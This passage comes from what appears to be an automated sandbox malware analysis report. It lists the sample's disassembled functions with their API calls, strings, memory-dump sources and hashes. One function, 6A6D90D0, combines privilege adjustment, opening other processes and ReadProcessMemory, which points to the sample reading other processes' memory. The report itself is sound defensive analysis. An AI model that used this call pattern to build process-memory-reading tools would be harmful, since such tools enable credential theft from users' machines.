                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                                                                  • String ID:
                                                                                  • API String ID: 1549993015-0
                                                                                  • Opcode ID: 200b89e0b381af869f3231e386db655f8e4c551a08ff4985dc9ce113d49312d7
                                                                                  • Instruction ID: f616acbb12ae345fea66c1a804d9d357ab8f36eec6b90e0ad92c4c763a8c6156
                                                                                  • Opcode Fuzzy Hash: 200b89e0b381af869f3231e386db655f8e4c551a08ff4985dc9ce113d49312d7
                                                                                  • Instruction Fuzzy Hash: 9BF05E322002119BDB116FA9DD4CE2B36FAAFC666471A0A24F925D3281DF70DC079BA4
                                                                                  Function 6A6FDCC4 Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6FE5E7: _doexit.LIBCMT ref: 6A6FE5F3
                                                                                  • ___set_flsgetvalue.LIBCMT ref: 6A6FDCD5
                                                                                    • Part of subcall function 6A705695: TlsGetValue.KERNEL32(?,6A705821,?,?,6A6D65A5,?,00000104,6A71BAA0,?,6A6D101E), ref: 6A70569E
                                                                                    • Part of subcall function 6A705695: __decode_pointer.LIBCMT ref: 6A7056B0
                                                                                    • Part of subcall function 6A705695: TlsSetValue.KERNEL32(00000000,?,6A6D65A5,?,00000104,6A71BAA0,?,6A6D101E), ref: 6A7056BF
                                                                                  • ___fls_getvalue@4.LIBCMT ref: 6A6FDCE0
                                                                                    • Part of subcall function 6A705675: TlsGetValue.KERNEL32(?,?,6A6FDCE5,00000000), ref: 6A705683
                                                                                  • ___fls_setvalue@8.LIBCMT ref: 6A6FDCF2
                                                                                    • Part of subcall function 6A7056C9: __decode_pointer.LIBCMT ref: 6A7056DA
                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 6A6FDCFB
                                                                                  • ExitThread.KERNEL32 ref: 6A6FDD02
                                                                                  • __freefls@4.LIBCMT ref: 6A6FDD1E
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 6A6FDD31
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                  • String ID:
                                                                                  • API String ID: 1537469427-0
                                                                                  • Opcode ID: ee36c20a79592796ab1ad16eb42480ae7887be91928c63acc8780ac256425564
                                                                                  • Instruction ID: 9786baab2c646c55acec5c0e6dd8eb350c66fd5d27ee655405539814dc88a851
                                                                                  • Opcode Fuzzy Hash: ee36c20a79592796ab1ad16eb42480ae7887be91928c63acc8780ac256425564
                                                                                  • Instruction Fuzzy Hash: 38E0ECB180020AAB8F003BF1DE1D96E7AEE5E5174DB168960FA16D3016EF28A8164A95
                                                                                  Function 0BE9E87F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetThreadLocale.KERNEL32(?,00000000,0BE9EA4A,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0BE9E8AF
                                                                                    • Part of subcall function 0BE9E548: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0BE9E566
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Locale$InfoThread
                                                                                  • String ID: eeee$ggg$yyyy
                                                                                  • API String ID: 4232894706-1253427255
                                                                                  • Opcode ID: aa42fe545bf88fe55df422e39f4362b8c2a9b1c36c3cdc89c2a9cd80b73241ac
                                                                                  • Instruction ID: 941e5a02245b63ede8308688cf3c15daab54af40fd9989152144b68a5dbe862b
                                                                                  • Opcode Fuzzy Hash: aa42fe545bf88fe55df422e39f4362b8c2a9b1c36c3cdc89c2a9cd80b73241ac
                                                                                  • Instruction Fuzzy Hash: 4D4127347041068FCF25EBB9F8922FEB3E6EF84140B183565D662D3364E6A0ED0E8261
                                                                                  Function 6A6DAF10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  • %X%s, xrefs: 6A6DAFB9
                                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789, xrefs: 6A6DAF53
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memsetwsprintf
                                                                                  • String ID: %X%s$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
                                                                                  • API String ID: 1984265443-1468443404
                                                                                  • Opcode ID: a45950ed4d60a3b2c8a396de41871a8c7f88a131651859f93148c4ab17c14374
                                                                                  • Instruction ID: 353180ce6540c63e3781f139e26f0435108b0a4f7f5304b7c71a64c9844d633b
                                                                                  • Opcode Fuzzy Hash: a45950ed4d60a3b2c8a396de41871a8c7f88a131651859f93148c4ab17c14374
                                                                                  • Instruction Fuzzy Hash: 011148626083505FE31CFA28D915BBBBAD79BC6304F48883DFC899B295D92859084393
                                                                                  Function 6A6D90D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • ReadProcessMemory.KERNEL32 ref: 6A6D911F
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6D914D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Memory$ProcessVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilegeRead
                                                                                  • String ID: (9k$U
                                                                                  • API String ID: 3726627124-349914351
                                                                                  • Opcode ID: 045ec8f332b4c9fd249bdb7c6587d69a2c71ad32a617f7b6af75d4e5df7f694f
                                                                                  • Instruction ID: 3e1efd261d3d4e048a8166d43b162f8802eb883a7e8ef5420c6cb018f07ad295
                                                                                  • Opcode Fuzzy Hash: 045ec8f332b4c9fd249bdb7c6587d69a2c71ad32a617f7b6af75d4e5df7f694f
                                                                                  • Instruction Fuzzy Hash: A411E131608381ABC701EB28CC09A5FBFE5AFDA254F054A5CF498C72A1D774C905CBAB
                                                                                  Function 6A6F8F23 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6F418D: EnterCriticalSection.KERNEL32(6A72D1A0,?,?,00000000,?,6A6F3A94,00000010,00000008,6A6F393F,6A6F38E2,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F41C7
                                                                                    • Part of subcall function 6A6F418D: InitializeCriticalSection.KERNEL32(?,?,00000000,?,6A6F3A94,00000010,00000008,6A6F393F,6A6F38E2,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F41D9
                                                                                    • Part of subcall function 6A6F418D: LeaveCriticalSection.KERNEL32(6A72D1A0,?,00000000,?,6A6F3A94,00000010,00000008,6A6F393F,6A6F38E2,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F41E6
                                                                                    • Part of subcall function 6A6F418D: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,6A6F3A94,00000010,00000008,6A6F393F,6A6F38E2,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F41F6
                                                                                    • Part of subcall function 6A6F3A79: __EH_prolog3_catch.LIBCMT ref: 6A6F3A80
                                                                                    • Part of subcall function 6A6EE232: __CxxThrowException@8.LIBCMT ref: 6A6EE248
                                                                                    • Part of subcall function 6A6EE232: __EH_prolog3.LIBCMT ref: 6A6EE255
                                                                                  • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 6A6F8F6C
                                                                                  • FreeLibrary.KERNEL32(?), ref: 6A6F8F7C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                  • String ID: HtmlHelpA$hhctrl.ocx
                                                                                  • API String ID: 2853499158-63838506
                                                                                  • Opcode ID: 6165336149ef1f0b76d048e35179ee409b16bd22e045e42d63cdd9f94cb54863
                                                                                  • Instruction ID: 133f17553355cf3764821e1e34734b75d420bd2fd675639cd43cd9f4dd7f0866
                                                                                  • Opcode Fuzzy Hash: 6165336149ef1f0b76d048e35179ee409b16bd22e045e42d63cdd9f94cb54863
                                                                                  • Instruction Fuzzy Hash: 1801FD3204A70AAFDB211FA3C90CB4B3AE7AF01B95F008D6AF55991460DF70D8528A26
                                                                                  Function 6A70E140 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___BuildCatchObject.LIBCMT ref: 6A70E153
                                                                                    • Part of subcall function 6A70E0AE: ___BuildCatchObjectHelper.LIBCMT ref: 6A70E0E4
                                                                                  • _UnwindNestedFrames.LIBCMT ref: 6A70E16A
                                                                                  • ___FrameUnwindToState.LIBCMT ref: 6A70E178
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                  • String ID: csm
                                                                                  • API String ID: 2163707966-1018135373
                                                                                  • Opcode ID: 828603360b51eb85b92ad848efaa8f4f417f419bab23d6e14f156f2916d7a9f6
                                                                                  • Instruction ID: dae79872b6afa9f306b7443450e1562fad68e07ee69f66abfadbca9ff1f17eda
                                                                                  • Opcode Fuzzy Hash: 828603360b51eb85b92ad848efaa8f4f417f419bab23d6e14f156f2916d7a9f6
                                                                                  • Instruction Fuzzy Hash: B301F6B1001209BBDF125F51CE48EAB7FAAEF1A358F018021FD5815161DB3699B5DBA4
                                                                                  Function 6A70F60A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,6A70392A), ref: 6A70F60F
                                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 6A70F61F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                  • API String ID: 1646373207-3105848591
                                                                                  • Opcode ID: fa0100f1ba1be966c1a4cb08252745032906c23393827c68f0a9c61bdcde82df
                                                                                  • Instruction ID: fa5def963580afa149755648a4c259c2d500571b963c315ef6223eec1b6a4738
                                                                                  • Opcode Fuzzy Hash: fa0100f1ba1be966c1a4cb08252745032906c23393827c68f0a9c61bdcde82df
                                                                                  • Instruction Fuzzy Hash: 3BF01D70A04909A2EF002BA2EE0A66F7AF9AF95702F8604A4D595F0084DE318879C696
                                                                                  Function 6A714A7D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog3.LIBCMT ref: 6A714A84
                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 6A714AA1
                                                                                  • __CxxThrowException@8.LIBCMT ref: 6A714AAF
                                                                                    • Part of subcall function 6A7013A2: RaiseException.KERNEL32(?,?,00000000,?), ref: 6A7013E4
                                                                                    • Part of subcall function 6A6E69A0: std::exception::exception.LIBCMT ref: 6A6E69CE
                                                                                  Strings
                                                                                  • invalid string position, xrefs: 6A714A89
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                  • String ID: invalid string position
                                                                                  • API String ID: 3355147766-1799206989
                                                                                  • Opcode ID: 2d5eb7cb2dbe915335c97a8e113ce5200962e5e13ca7f84e7ee2e2e68dbfd2ec
                                                                                  • Instruction ID: c3b6e02e64366dba9fa9176ce397b611d9f60520dd04c7ea60e185313380414c
                                                                                  • Opcode Fuzzy Hash: 2d5eb7cb2dbe915335c97a8e113ce5200962e5e13ca7f84e7ee2e2e68dbfd2ec
                                                                                  • Instruction Fuzzy Hash: 8EF039B2915218ABCB10DAD1CA88DDEBBBCAB40269F490425E304AB541DF749E0CC7E4
                                                                                  Function 0BEA0380 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0BEA0386
